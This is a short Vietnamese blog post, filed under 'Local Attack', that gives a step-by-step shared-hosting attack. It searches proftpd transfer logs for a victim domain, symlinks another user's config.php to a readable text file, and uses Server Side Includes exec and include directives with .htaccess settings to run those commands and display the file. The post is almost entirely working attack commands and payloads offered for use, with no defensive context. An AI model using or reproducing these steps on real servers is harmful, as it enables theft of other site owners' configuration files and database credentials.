Trang chủ
»
Local Attack
» SHTML Bypass View Symlink - Server Side Includes
16 thg 6, 2012
SHTML Bypass View Symlink - Server Side Includes
I. Server Side Includes
II. Find Victim:cd /var/log/proftpdmore xferlog.*|grep victim.comor go to step IVcat xferlog.*|grep victim.com<!--#exec cmd="more xferlog.*|grep victim.com" -->
III. Symlink:or go to step IVln -s /home/...../public_html/config.php config.txtIV. View - Use Server Side Includes:<!--#exec cmd="ln -s /home/...../public_html/config.php config.txt" -->
Create cmd.shtml with content:<!--#include virtual="config.txt" -->
V. Note:
.htaccessOptions +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml
Không có nhận xét nào:
Đăng nhận xét